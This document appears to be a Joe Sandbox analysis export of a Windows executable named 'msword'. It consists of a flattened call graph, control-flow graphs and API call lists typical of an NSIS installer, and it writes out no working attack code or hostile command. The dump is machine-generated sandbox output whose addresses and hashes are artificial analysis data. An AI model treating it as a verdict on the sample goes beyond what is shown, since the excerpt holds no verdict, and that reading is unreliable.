40176e 3835->3840 3841 401650 3835->3841 3842 4017b1 3835->3842 3843 401672 3835->3843 
3844 401693 3835->3844 3845 401616 3835->3845 3846 4016d6 3835->3846 3847 401736 3835->3847 3848 401897 3835->3848 3849 4018db 3835->3849 3850 40163c 3835->3850 3851 4016bd 3835->3851 3835->3914 3864 4062a3 11 API calls 3836->3864 3856 401751 ShowWindow 3837->3856 3857 401758 3837->3857 3861 40145c 18 API calls 3838->3861 3854 40145c 18 API calls 3839->3854 3858 40145c 18 API calls 3840->3858 3881 4062a3 11 API calls 3841->3881 3947 40145c 3842->3947 3859 40145c 18 API calls 3843->3859 3941 401446 3844->3941 3853 40145c 18 API calls 3845->3853 3870 401446 18 API calls 3846->3870 3846->3914 3847->3914 3963 405f51 wsprintfW 3847->3963 3860 40145c 18 API calls 3848->3860 3865 40145c 18 API calls 3849->3865 3855 401647 PostQuitMessage 3850->3855 3850->3914 3852 4062a3 11 API calls 3851->3852 3867 4016c7 SetForegroundWindow 3852->3867 3868 40161c 3853->3868 3869 4019d1 SearchPathW 3854->3869 3855->3914 3856->3857 3871 401765 ShowWindow 3857->3871 3857->3914 3872 401775 3858->3872 3873 401678 3859->3873 3874 40189d 3860->3874 3875 401968 GetFullPathNameW 3861->3875 3864->3914 3866 4018e2 3865->3866 3878 40145c 18 API calls 3866->3878 3867->3914 3879 4062a3 11 API calls 3868->3879 3869->3914 3870->3914 3871->3914 3882 4062a3 11 API calls 3872->3882 3883 4062a3 11 API calls 3873->3883 3959 4062d5 FindFirstFileW 3874->3959 3885 40197f 3875->3885 3927 4019a1 3875->3927 3877 40169a 3944 4062a3 lstrlenW wvsprintfW 3877->3944 3888 4018eb 3878->3888 3889 401627 3879->3889 3890 401664 3881->3890 3891 401785 SetFileAttributesW 3882->3891 3892 401683 3883->3892 3909 4062d5 2 API calls 3885->3909 3885->3927 3886 4062a3 11 API calls 3894 4017c9 3886->3894 3897 40145c 18 API calls 3888->3897 3898 404f72 25 API calls 3889->3898 3899 40139d 65 API calls 3890->3899 3900 40179a 3891->3900 3891->3914 3907 404f72 25 API calls 3892->3907 3952 405d59 CharNextW CharNextW 3894->3952 3896 4019b8 GetShortPathNameW 3896->3914 3905 4018f5 3897->3905 3898->3914 3899->3914 3906 4062a3 11 API calls 
3900->3906 3901 4018c2 3910 4062a3 11 API calls 3901->3910 3902 4018a9 3908 4062a3 11 API calls 3902->3908 3912 4062a3 11 API calls 3905->3912 3906->3914 3907->3914 3908->3914 3913 401991 3909->3913 3910->3914 3911 4017d4 3915 401864 3911->3915 3918 405d06 CharNextW 3911->3918 3936 4062a3 11 API calls 3911->3936 3916 401902 MoveFileW 3912->3916 3913->3927 3962 406009 lstrcpynW 3913->3962 3914->3832 3915->3892 3917 40186e 3915->3917 3919 401912 3916->3919 3920 40191e 3916->3920 3921 404f72 25 API calls 3917->3921 3923 4017e6 CreateDirectoryW 3918->3923 3919->3892 3925 401942 3920->3925 3930 4062d5 2 API calls 3920->3930 3926 401875 3921->3926 3923->3911 3924 4017fe GetLastError 3923->3924 3928 401827 GetFileAttributesW 3924->3928 3929 40180b GetLastError 3924->3929 3935 4062a3 11 API calls 3925->3935 3958 406009 lstrcpynW 3926->3958 3927->3896 3927->3914 3928->3911 3932 4062a3 11 API calls 3929->3932 3933 401929 3930->3933 3932->3911 3933->3925 3938 406c68 42 API calls 3933->3938 3934 401882 SetCurrentDirectoryW 3934->3914 3937 40195c 3935->3937 3936->3911 3937->3914 3939 401936 3938->3939 3940 404f72 25 API calls 3939->3940 3940->3925 3942 406805 18 API calls 3941->3942 3943 401455 3942->3943 3943->3877 3945 4060e7 9 API calls 3944->3945 3946 4016a7 Sleep 3945->3946 3946->3914 3948 406805 18 API calls 3947->3948 3949 401488 3948->3949 3950 401497 3949->3950 3951 406038 5 API calls 3949->3951 3950->3886 3951->3950 3953 405d76 3952->3953 3954 405d88 3952->3954 3953->3954 3955 405d83 CharNextW 3953->3955 3956 405dac 3954->3956 3957 405d06 CharNextW 3954->3957 3955->3956 3956->3911 3957->3954 3958->3934 3960 4018a5 3959->3960 3961 4062eb FindClose 3959->3961 3960->3901 3960->3902 3961->3960 3962->3927 3963->3914 3964->3822 3966 403c91 3965->3966 3967 403876 3966->3967 3968 403c96 FreeLibrary GlobalFree 3966->3968 3969 406c9b 3967->3969 3968->3967 3968->3968 3970 40677e 18 API calls 3969->3970 3971 406cae 3970->3971 3972 406cb7 DeleteFileW 3971->3972 3973 406cce 
3971->3973 4013 403882 CoUninitialize 3972->4013 3974 406e4b 3973->3974 4017 406009 lstrcpynW 3973->4017 3980 4062d5 2 API calls 3974->3980 4002 406e58 3974->4002 3974->4013 3976 406cf9 3977 406d03 lstrcatW 3976->3977 3978 406d0d 3976->3978 3979 406d13 3977->3979 3981 406751 2 API calls 3978->3981 3983 406d23 lstrcatW 3979->3983 3984 406d19 3979->3984 3982 406e64 3980->3982 3981->3979 3987 406722 3 API calls 3982->3987 3982->4013 3986 406d2b lstrlenW FindFirstFileW 3983->3986 3984->3983 3984->3986 3985 4062a3 11 API calls 3985->4013 3988 406e3b 3986->3988 3992 406d52 3986->3992 3989 406e6e 3987->3989 3988->3974 3991 4062a3 11 API calls 3989->3991 3990 405d06 CharNextW 3990->3992 3993 406e79 3991->3993 3992->3990 3996 406e18 FindNextFileW 3992->3996 4005 406c9b 72 API calls 3992->4005 4012 404f72 25 API calls 3992->4012 4014 4062a3 11 API calls 3992->4014 4015 404f72 25 API calls 3992->4015 4016 406c68 42 API calls 3992->4016 4018 406009 lstrcpynW 3992->4018 4019 405e30 GetFileAttributesW 3992->4019 3994 405e30 2 API calls 3993->3994 3995 406e81 RemoveDirectoryW 3994->3995 3999 406ec4 3995->3999 4000 406e8d 3995->4000 3996->3992 3998 406e30 FindClose 3996->3998 3998->3988 4001 404f72 25 API calls 3999->4001 4000->4002 4003 406e93 4000->4003 4001->4013 4002->3985 4004 4062a3 11 API calls 4003->4004 4006 406e9d 4004->4006 4005->3992 4008 404f72 25 API calls 4006->4008 4010 406ea7 4008->4010 4011 406c68 42 API calls 4010->4011 4011->4013 4012->3996 4013->3491 4013->3492 4014->3992 4015->3992 4016->3992 4017->3976 4018->3992 4020 405e4d DeleteFileW 4019->4020 4021 405e3f SetFileAttributesW 4019->4021 4020->3992 4021->4020 4022->3653 4023->3677 4024->3696 4025->3696 4026->3685 4028 406ae7 GetShortPathNameW 4027->4028 4029 406abe 4027->4029 4030 406b00 4028->4030 4031 406c62 4028->4031 4053 405e50 GetFileAttributesW CreateFileW 4029->4053 4030->4031 4033 406b08 WideCharToMultiByte 4030->4033 4031->3706 4033->4031 4035 406b25 WideCharToMultiByte 4033->4035 4034 406ac7 
CloseHandle GetShortPathNameW 4034->4031 4036 406adf 4034->4036 4035->4031 4037 406b3d wsprintfA 4035->4037 4036->4028 4036->4031 4038 406805 18 API calls 4037->4038 4039 406b69 4038->4039 4054 405e50 GetFileAttributesW CreateFileW 4039->4054 4041 406b76 4041->4031 4042 406b83 GetFileSize GlobalAlloc 4041->4042 4043 406ba4 ReadFile 4042->4043 4044 406c58 CloseHandle 4042->4044 4043->4044 4045 406bbe 4043->4045 4044->4031 4045->4044 4055 405db6 lstrlenA 4045->4055 4048 406bd7 lstrcpyA 4051 406bf9 4048->4051 4049 406beb 4050 405db6 4 API calls 4049->4050 4050->4051 4052 406c30 SetFilePointer WriteFile GlobalFree 4051->4052 4052->4044 4053->4034 4054->4041 4056 405df7 lstrlenA 4055->4056 4057 405dd0 lstrcmpiA 4056->4057 4058 405dff 4056->4058 4057->4058 4059 405dee CharNextA 4057->4059 4058->4048 4058->4049 4059->4056 4940 402a84 4941 401553 19 API calls 4940->4941 4942 402a8e 4941->4942 4943 401446 18 API calls 4942->4943 4944 402a98 4943->4944 4945 401a13 4944->4945 4946 402ab2 RegEnumKeyW 4944->4946 4947 402abe RegEnumValueW 4944->4947 4948 402a7e 4946->4948 4947->4945 4947->4948 4948->4945 4949 4029e4 RegCloseKey 4948->4949 4949->4945 4950 402c8a 4951 402ca2 4950->4951 4952 402c8f 4950->4952 4954 40145c 18 API calls 4951->4954 4953 401446 18 API calls 4952->4953 4956 402c97 4953->4956 4955 402ca9 lstrlenW 4954->4955 4955->4956 4957 402ccb WriteFile 4956->4957 4958 401a13 4956->4958 4957->4958 4959 40400d 4960 40406a 4959->4960 4961 40401a lstrcpynA lstrlenA 4959->4961 4961->4960 4962 40404b 4961->4962 4962->4960 4963 404057 GlobalFree 4962->4963 4963->4960 4964 401d8e 4965 40145c 18 API calls 4964->4965 4966 401d95 ExpandEnvironmentStringsW 4965->4966 4967 401da8 4966->4967 4969 401db9 4966->4969 4968 401dad lstrcmpW 4967->4968 4967->4969 4968->4969 4970 401e0f 4971 401446 18 API calls 4970->4971 4972 401e17 4971->4972 4973 401446 18 API calls 4972->4973 4974 401e21 4973->4974 4975 4030e3 4974->4975 4977 405f51 wsprintfW 4974->4977 4977->4975 4978 402392 4979 
40145c 18 API calls 4978->4979 4980 402399 4979->4980 4983 4071f8 4980->4983 4984 406ed2 25 API calls 4983->4984 4985 407218 4984->4985 4986 407222 lstrcpynW lstrcmpW 4985->4986 4987 4023a7 4985->4987 4988 407254 4986->4988 4989 40725a lstrcpynW 4986->4989 4988->4989 4989->4987 4060 402713 4075 406009 lstrcpynW 4060->4075 4062 40272c 4076 406009 lstrcpynW 4062->4076 4064 402738 4065 40145c 18 API calls 4064->4065 4067 402743 4064->4067 4065->4067 4066 402752 4069 40145c 18 API calls 4066->4069 4071 402761 4066->4071 4067->4066 4068 40145c 18 API calls 4067->4068 4068->4066 4069->4071 4070 40145c 18 API calls 4072 40276b 4070->4072 4071->4070 4073 4062a3 11 API calls 4072->4073 4074 40277f WritePrivateProfileStringW 4073->4074 4075->4062 4076->4064 4990 402797 4991 40145c 18 API calls 4990->4991 4992 4027ae 4991->4992 4993 40145c 18 API calls 4992->4993 4994 4027b7 4993->4994 4995 40145c 18 API calls 4994->4995 4996 4027c0 GetPrivateProfileStringW lstrcmpW 4995->4996 4997 402e18 4998 40145c 18 API calls 4997->4998 4999 402e1f FindFirstFileW 4998->4999 5000 402e32 4999->5000 5005 405f51 wsprintfW 5000->5005 5002 402e43 5006 406009 lstrcpynW 5002->5006 5004 402e50 5005->5002 5006->5004 5007 401e9a 5008 40145c 18 API calls 5007->5008 5009 401ea1 5008->5009 5010 401446 18 API calls 5009->5010 5011 401eab wsprintfW 5010->5011 4287 401a1f 4288 40145c 18 API calls 4287->4288 4289 401a26 4288->4289 4290 4062a3 11 API calls 4289->4290 4291 401a49 4290->4291 4292 401a64 4291->4292 4293 401a5c 4291->4293 4341 406009 lstrcpynW 4292->4341 4340 406009 lstrcpynW 4293->4340 4296 401a62 4300 406038 5 API calls 4296->4300 4297 401a6f 4298 406722 3 API calls 4297->4298 4299 401a75 lstrcatW 4298->4299 4299->4296 4302 401a81 4300->4302 4301 4062d5 2 API calls 4301->4302 4302->4301 4303 405e30 2 API calls 4302->4303 4305 401a98 CompareFileTime 4302->4305 4306 401ba9 4302->4306 4310 4062a3 11 API calls 4302->4310 4314 406009 lstrcpynW 4302->4314 4320 406805 18 API calls 4302->4320 4327 
405ca0 MessageBoxIndirectW 4302->4327 4331 401b50 4302->4331 4338 401b5d 4302->4338 4339 405e50 GetFileAttributesW CreateFileW 4302->4339 4303->4302 4305->4302 4307 404f72 25 API calls 4306->4307 4309 401bb3 4307->4309 4308 404f72 25 API calls 4311 401b70 4308->4311 4312 40337f 37 API calls 4309->4312 4310->4302 4315 4062a3 11 API calls 4311->4315 4313 401bc6 4312->4313 4316 4062a3 11 API calls 4313->4316 4314->4302 4322 401b8b 4315->4322 4317 401bda 4316->4317 4318 401be9 SetFileTime 4317->4318 4319 401bf8 CloseHandle 4317->4319 4318->4319 4321 401c09 4319->4321 4319->4322 4320->4302 4323 401c21 4321->4323 4324 401c0e 4321->4324 4326 406805 18 API calls 4323->4326 4325 406805 18 API calls 4324->4325 4328 401c16 lstrcatW 4325->4328 4329 401c29 4326->4329 4327->4302 4328->4329 4330 4062a3 11 API calls 4329->4330 4332 401c34 4330->4332 4333 401b93 4331->4333 4334 401b53 4331->4334 4335 405ca0 MessageBoxIndirectW 4332->4335 4336 4062a3 11 API calls 4333->4336 4337 4062a3 11 API calls 4334->4337 4335->4322 4336->4322 4337->4338 4338->4308 4339->4302 4340->4296 4341->4297 5012 40209f GetDlgItem GetClientRect 5013 40145c 18 API calls 5012->5013 5014 4020cf LoadImageW SendMessageW 5013->5014 5015 4030e3 5014->5015 5016 4020ed DeleteObject 5014->5016 5016->5015 5017 402b9f 5018 401446 18 API calls 5017->5018 5023 402ba7 5018->5023 5019 402c4a 5020 402bdf ReadFile 5022 402c3d 5020->5022 5020->5023 5021 401446 18 API calls 5021->5022 5022->5019 5022->5021 5029 402d17 ReadFile 5022->5029 5023->5019 5023->5020 5023->5022 5024 402c06 MultiByteToWideChar 5023->5024 5025 402c3f 5023->5025 5027 402c4f 5023->5027 5024->5023 5024->5027 5030 405f51 wsprintfW 5025->5030 5027->5022 5028 402c6b SetFilePointer 5027->5028 5028->5022 5029->5022 5030->5019 5031 402b23 GlobalAlloc 5032 402b39 5031->5032 5033 402b4b 5031->5033 5034 401446 18 API calls 5032->5034 5035 40145c 18 API calls 5033->5035 5036 402b41 5034->5036 5037 402b52 WideCharToMultiByte lstrlenA 5035->5037 5038 402b93 
5036->5038 5039 402b84 WriteFile 5036->5039 5037->5036 5039->5038 5040 402384 GlobalFree 5039->5040 5040->5038 5042 4044a5 5043 404512 5042->5043 5044 4044df 5042->5044 5046 40451f GetDlgItem GetAsyncKeyState 5043->5046 5053 4045b1 5043->5053 5110 405c84 GetDlgItemTextW 5044->5110 5049 40453e GetDlgItem 5046->5049 5056 40455c 5046->5056 5047 4044ea 5050 406038 5 API calls 5047->5050 5048 40469d 5108 404833 5048->5108 5112 405c84 GetDlgItemTextW 5048->5112 5051 403d3f 19 API calls 5049->5051 5052 4044f0 5050->5052 5055 404551 ShowWindow 5051->5055 5058 403e74 5 API calls 5052->5058 5053->5048 5059 406805 18 API calls 5053->5059 5053->5108 5055->5056 5061 404579 SetWindowTextW 5056->5061 5066 405d59 4 API calls 5056->5066 5057 403dca 8 API calls 5062 404847 5057->5062 5063 4044f5 GetDlgItem 5058->5063 5064 40462f SHBrowseForFolderW 5059->5064 5060 4046c9 5065 40677e 18 API calls 5060->5065 5067 403d3f 19 API calls 5061->5067 5068 404503 IsDlgButtonChecked 5063->5068 5063->5108 5064->5048 5069 404647 CoTaskMemFree 5064->5069 5070 4046cf 5065->5070 5071 40456f 5066->5071 5072 404597 5067->5072 5068->5043 5073 406722 3 API calls 5069->5073 5113 406009 lstrcpynW 5070->5113 5071->5061 5077 406722 3 API calls 5071->5077 5074 403d3f 19 API calls 5072->5074 5075 404654 5073->5075 5078 4045a2 5074->5078 5079 40468b SetDlgItemTextW 5075->5079 5084 406805 18 API calls 5075->5084 5077->5061 5111 403d98 SendMessageW 5078->5111 5079->5048 5080 4046e6 5082 4062fc 3 API calls 5080->5082 5091 4046ee 5082->5091 5083 4045aa 5087 4062fc 3 API calls 5083->5087 5085 404673 lstrcmpiW 5084->5085 5085->5079 5088 404684 lstrcatW 5085->5088 5086 404730 5114 406009 lstrcpynW 5086->5114 5087->5053 5088->5079 5090 404739 5092 405d59 4 API calls 5090->5092 5091->5086 5096 406751 2 API calls 5091->5096 5097 404785 5091->5097 5093 40473f GetDiskFreeSpaceW 5092->5093 5095 404763 MulDiv 5093->5095 5093->5097 5095->5097 5096->5091 5099 4047e2 5097->5099 5100 4043ad 21 API calls 5097->5100 5098 404805 
5115 403d85 KiUserCallbackDispatcher 5098->5115 5099->5098 5101 40141d 80 API calls 5099->5101 5102 4047d3 5100->5102 5101->5098 5104 4047e4 SetDlgItemTextW 5102->5104 5105 4047d8 5102->5105 5104->5099 5106 4043ad 21 API calls 5105->5106 5106->5099 5107 404821 5107->5108 5116 403d61 5107->5116 5108->5057 5110->5047 5111->5083 5112->5060 5113->5080 5114->5090 5115->5107 5117 403d74 SendMessageW 5116->5117 5118 403d6f 5116->5118 5117->5108 5118->5117 5119 402da5 5120 4030e3 5119->5120 5121 402dac 5119->5121 5122 401446 18 API calls 5121->5122 5123 402db8 5122->5123 5124 402dbf SetFilePointer 5123->5124 5124->5120 5125 402dcf 5124->5125 5125->5120 5127 405f51 wsprintfW 5125->5127 5127->5120 5128 4030a9 SendMessageW 5129 4030c2 InvalidateRect 5128->5129 5130 4030e3 5128->5130 5129->5130 5131 401cb2 5132 40145c 18 API calls 5131->5132 5133 401c54 5132->5133 5134 4062a3 11 API calls 5133->5134 5137 401c64 5133->5137 5135 401c59 5134->5135 5136 406c9b 81 API calls 5135->5136 5136->5137 4087 4021b5 4088 40145c 18 API calls 4087->4088 4089 4021bb 4088->4089 4090 40145c 18 API calls 4089->4090 4091 4021c4 4090->4091 4092 40145c 18 API calls 4091->4092 4093 4021cd 4092->4093 4094 40145c 18 API calls 4093->4094 4095 4021d6 4094->4095 4096 404f72 25 API calls 4095->4096 4097 4021e2 ShellExecuteW 4096->4097 4098 40221b 4097->4098 4099 40220d 4097->4099 4101 4062a3 11 API calls 4098->4101 4100 4062a3 11 API calls 4099->4100 4100->4098 4102 402230 4101->4102 5145 402238 5146 40145c 18 API calls 5145->5146 5147 40223e 5146->5147 5148 4062a3 11 API calls 5147->5148 5149 40224b 5148->5149 5150 404f72 25 API calls 5149->5150 5151 402255 5150->5151 5152 405c3f 2 API calls 5151->5152 5153 40225b 5152->5153 5154 4062a3 11 API calls 5153->5154 5157 4022ac CloseHandle 5153->5157 5160 40226d 5154->5160 5156 4030e3 5157->5156 5158 402283 WaitForSingleObject 5159 402291 GetExitCodeProcess 5158->5159 5158->5160 5159->5157 5162 4022a3 5159->5162 5160->5157 5160->5158 5161 406332 2 API calls 
5160->5161 5161->5158 5164 405f51 wsprintfW 5162->5164 5164->5157 5165 4040b8 5166 4040d3 5165->5166 5174 404201 5165->5174 5170 40410e 5166->5170 5196 403fca WideCharToMultiByte 5166->5196 5167 40426c 5168 404276 GetDlgItem 5167->5168 5169 40433e 5167->5169 5171 404290 5168->5171 5172 4042ff 5168->5172 5175 403dca 8 API calls 5169->5175 5177 403d3f 19 API calls 5170->5177 5171->5172 5180 4042b6 6 API calls 5171->5180 5172->5169 5181 404311 5172->5181 5174->5167 5174->5169 5176 40423b GetDlgItem SendMessageW 5174->5176 5179 404339 5175->5179 5201 403d85 KiUserCallbackDispatcher 5176->5201 5178 40414e 5177->5178 5183 403d3f 19 API calls 5178->5183 5180->5172 5184 404327 5181->5184 5185 404317 SendMessageW 5181->5185 5188 40415b CheckDlgButton 5183->5188 5184->5179 5189 40432d SendMessageW 5184->5189 5185->5184 5186 404267 5187 403d61 SendMessageW 5186->5187 5187->5167 5199 403d85 KiUserCallbackDispatcher 5188->5199 5189->5179 5191 404179 GetDlgItem 5200 403d98 SendMessageW 5191->5200 5193 40418f SendMessageW 5194 4041b5 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5193->5194 5195 4041ac GetSysColor 5193->5195 5194->5179 5195->5194 5197 404007 5196->5197 5198 403fe9 GlobalAlloc WideCharToMultiByte 5196->5198 5197->5170 5198->5197 5199->5191 5200->5193 5201->5186 4196 401eb9 4197 401f24 4196->4197 4198 401ec6 4196->4198 4199 401f53 GlobalAlloc 4197->4199 4200 401f28 4197->4200 4201 401ed5 4198->4201 4208 401ef7 4198->4208 4202 406805 18 API calls 4199->4202 4207 4062a3 11 API calls 4200->4207 4212 401f36 4200->4212 4203 4062a3 11 API calls 4201->4203 4206 401f46 4202->4206 4204 401ee2 4203->4204 4209 402708 4204->4209 4214 406805 18 API calls 4204->4214 4206->4209 4210 402387 GlobalFree 4206->4210 4207->4212 4218 406009 lstrcpynW 4208->4218 4210->4209 4220 406009 lstrcpynW 4212->4220 4213 401f06 4219 406009 lstrcpynW 4213->4219 4214->4204 4216 401f15 4221 406009 lstrcpynW 4216->4221 4218->4213 4219->4216 4220->4206 4221->4209 5202 4074bb 5204 407344 
5202->5204 5203 407c6d 5204->5203 5205 4073c2 GlobalFree 5204->5205 5206 4073cb GlobalAlloc 5204->5206 5207 407443 GlobalAlloc 5204->5207 5208 40743a GlobalFree 5204->5208 5205->5206 5206->5203 5206->5204 5207->5203 5207->5204 5208->5207

                                                                            Control-flow Graph

                                                                            control_flow_graph 0 4050cd-4050e8 1 405295-40529c 0->1 2 4050ee-4051d5 GetDlgItem * 3 call 403d98 call 404476 call 406805 call 4062a3 GetClientRect GetSystemMetrics SendMessageW * 2 0->2 3 4052c6-4052d3 1->3 4 40529e-4052c0 GetDlgItem CreateThread CloseHandle 1->4 35 4051f3-4051f6 2->35 36 4051d7-4051f1 SendMessageW * 2 2->36 6 4052f4-4052fb 3->6 7 4052d5-4052de 3->7 4->3 11 405352-405356 6->11 12 4052fd-405303 6->12 9 4052e0-4052ef ShowWindow * 2 call 403d98 7->9 10 405316-40531f call 403dca 7->10 9->6 22 405324-405328 10->22 11->10 14 405358-40535b 11->14 16 405305-405311 call 403d18 12->16 17 40532b-40533b ShowWindow 12->17 14->10 20 40535d-405370 SendMessageW 14->20 16->10 23 40534b-40534d call 403d18 17->23 24 40533d-405346 call 404f72 17->24 27 405376-405397 CreatePopupMenu call 406805 AppendMenuW 20->27 28 40528e-405290 20->28 23->11 24->23 37 405399-4053aa GetWindowRect 27->37 38 4053ac-4053b2 27->38 28->22 39 405206-40521d call 403d3f 35->39 40 4051f8-405204 SendMessageW 35->40 36->35 41 4053b3-4053cb TrackPopupMenu 37->41 38->41 46 405253-405274 GetDlgItem SendMessageW 39->46 47 40521f-405233 ShowWindow 39->47 40->39 41->28 43 4053d1-4053e8 41->43 45 4053ed-405408 SendMessageW 43->45 45->45 48 40540a-40542d OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 45->48 46->28 51 405276-40528c SendMessageW * 2 46->51 49 405242 47->49 50 405235-405240 ShowWindow 47->50 52 40542f-405458 SendMessageW 48->52 53 405248-40524e call 403d98 49->53 50->53 51->28 52->52 54 40545a-405474 GlobalUnlock SetClipboardData CloseClipboard 52->54 53->46 54->28
                                                                            APIs
                                                                            • GetDlgItem.USER32(?,00000403), ref: 0040512F
                                                                            • GetDlgItem.USER32(?,000003EE), ref: 0040513E
                                                                            • GetClientRect.USER32(?,?), ref: 00405196
                                                                            • GetSystemMetrics.USER32(00000015), ref: 0040519E
                                                                            • SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004051BF
                                                                            • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004051D0
                                                                            • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004051E3
                                                                            • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004051F1
                                                                            • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405204
                                                                            • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405226
                                                                            • ShowWindow.USER32(?,00000008), ref: 0040523A
                                                                            • GetDlgItem.USER32(?,000003EC), ref: 0040525B
                                                                            • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040526B
                                                                            • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405280
                                                                            • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 0040528C
                                                                            • GetDlgItem.USER32(?,000003F8), ref: 0040514D
                                                                              • Part of subcall function 00403D98: SendMessageW.USER32(00000028,?,00000001,004057B4), ref: 00403DA6
                                                                              • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                                              • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                              • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                            • GetDlgItem.USER32(?,000003EC), ref: 004052AB
                                                                            • CreateThread.KERNELBASE(00000000,00000000,Function_00005047,00000000), ref: 004052B9
                                                                            • CloseHandle.KERNELBASE(00000000), ref: 004052C0
                                                                            • ShowWindow.USER32(00000000), ref: 004052E7
                                                                            • ShowWindow.USER32(?,00000008), ref: 004052EC
                                                                            • ShowWindow.USER32(00000008), ref: 00405333
                                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405365
                                                                            • CreatePopupMenu.USER32 ref: 00405376
                                                                            • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 0040538B
                                                                            • GetWindowRect.USER32(?,?), ref: 0040539E
                                                                            • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053C0
                                                                            • SendMessageW.USER32(?,00001073,00000000,?), ref: 004053FB
                                                                            • OpenClipboard.USER32(00000000), ref: 0040540B
                                                                            • EmptyClipboard.USER32 ref: 00405411
                                                                            • GlobalAlloc.KERNEL32(00000042,00000000,?,?,00000000,?,00000000), ref: 0040541D
                                                                            • GlobalLock.KERNEL32(00000000), ref: 00405427
                                                                            • SendMessageW.USER32(?,00001073,00000000,?), ref: 0040543B
                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 0040545D
                                                                            • SetClipboardData.USER32(0000000D,00000000), ref: 00405468
                                                                            • CloseClipboard.USER32 ref: 0040546E
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000E.00000002.1969136933.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000E.00000002.1969046534.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                            • Associated: 0000000E.00000002.1969169410.0000000000408000.00000002.00000001.01000000.0000000C.sdmp
                                                                            • Associated: 0000000E.00000002.1969278177.000000000040B000.00000004.00000001.01000000.0000000C.sdmp
                                                                            • Associated: 0000000E.00000002.1969278177.000000000041F000.00000004.00000001.01000000.0000000C.sdmp
                                                                            • Associated: 0000000E.00000002.1969278177.0000000000461000.00000004.00000001.01000000.0000000C.sdmp
                                                                            • Associated: 0000000E.00000002.1969432159.00000000004F4000.00000002.00000001.01000000.0000000C.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_14_2_400000_msword.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlockVersionlstrlenwvsprintf
                                                                            • String ID: @rD$New install of "%s" to "%s"${
                                                                            • API String ID: 2110491804-2409696222
                                                                            • Opcode ID: f168db28b2c12902a58862b60cbdcc3c6e49ead995c60d9878de2ccec3fe74d8
                                                                            • Instruction ID: 480b9f2609884c7685ddca5963e0cfcc77f9e358d06567921943d8ab7e89b76b
                                                                            • Opcode Fuzzy Hash: f168db28b2c12902a58862b60cbdcc3c6e49ead995c60d9878de2ccec3fe74d8
                                                                            • Instruction Fuzzy Hash: 14B15B70800608FFDB11AFA0DD85EAE7B79EF44355F00803AFA45BA1A0CBB49A519F59

                                                                            Control-flow Graph

                                                                            control_flow_graph 305 403883-403919 #17 SetErrorMode OleInitialize call 4062fc SHGetFileInfoW call 406009 GetCommandLineW call 406009 GetModuleHandleW 312 403923-403937 call 405d06 CharNextW 305->312 313 40391b-40391e 305->313 316 4039ca-4039d0 312->316 313->312 317 4039d6 316->317 318 40393c-403942 316->318 319 4039f5-403a0d GetTempPathW call 4037cc 317->319 320 403944-40394a 318->320 321 40394c-403950 318->321 328 403a33-403a4d DeleteFileW call 403587 319->328 329 403a0f-403a2d GetWindowsDirectoryW lstrcatW call 4037cc 319->329 320->320 320->321 323 403952-403957 321->323 324 403958-40395c 321->324 323->324 326 4039b8-4039c5 call 405d06 324->326 327 40395e-403965 324->327 326->316 342 4039c7 326->342 331 403967-40396e 327->331 332 40397a-40398c call 403800 327->332 345 403acc-403adb call 403859 CoUninitialize 328->345 346 403a4f-403a55 328->346 329->328 329->345 333 403970-403973 331->333 334 403975 331->334 343 4039a1-4039b6 call 403800 332->343 344 40398e-403995 332->344 333->332 333->334 334->332 342->316 343->326 361 4039d8-4039f0 call 407d6e call 406009 343->361 348 403997-40399a 344->348 349 40399c 344->349 359 403ae1-403af1 call 405ca0 ExitProcess 345->359 360 403bce-403bd4 345->360 351 403ab5-403abc call 40592c 346->351 352 403a57-403a60 call 405d06 346->352 348->343 348->349 349->343 358 403ac1-403ac7 call 4060e7 351->358 362 403a79-403a7b 352->362 358->345 365 403c51-403c59 360->365 366 403bd6-403bf3 call 4062fc * 3 360->366 361->319 370 403a62-403a74 call 403800 362->370 371 403a7d-403a87 362->371 372 403c5b 365->372 373 403c5f 365->373 397 403bf5-403bf7 366->397 398 403c3d-403c48 ExitWindowsEx 366->398 370->371 384 403a76 370->384 378 403af7-403b11 lstrcatW lstrcmpiW 371->378 379 403a89-403a99 call 40677e 371->379 372->373 378->345 383 403b13-403b29 CreateDirectoryW SetCurrentDirectoryW 378->383 379->345 390 403a9b-403ab1 call 406009 * 2 379->390 387 403b36-403b56 call 406009 
* 2 383->387 388 403b2b-403b31 call 406009 383->388 384->362 404 403b5b-403b77 call 406805 DeleteFileW 387->404 388->387 390->351 397->398 402 403bf9-403bfb 397->402 398->365 401 403c4a-403c4c call 40141d 398->401 401->365 402->398 406 403bfd-403c0f GetCurrentProcess 402->406 412 403bb8-403bc0 404->412 413 403b79-403b89 CopyFileW 404->413 406->398 411 403c11-403c33 406->411 411->398 412->404 414 403bc2-403bc9 call 406c68 412->414 413->412 415 403b8b-403bab call 406c68 call 406805 call 405c3f 413->415 414->345 415->412 425 403bad-403bb4 CloseHandle 415->425 425->412
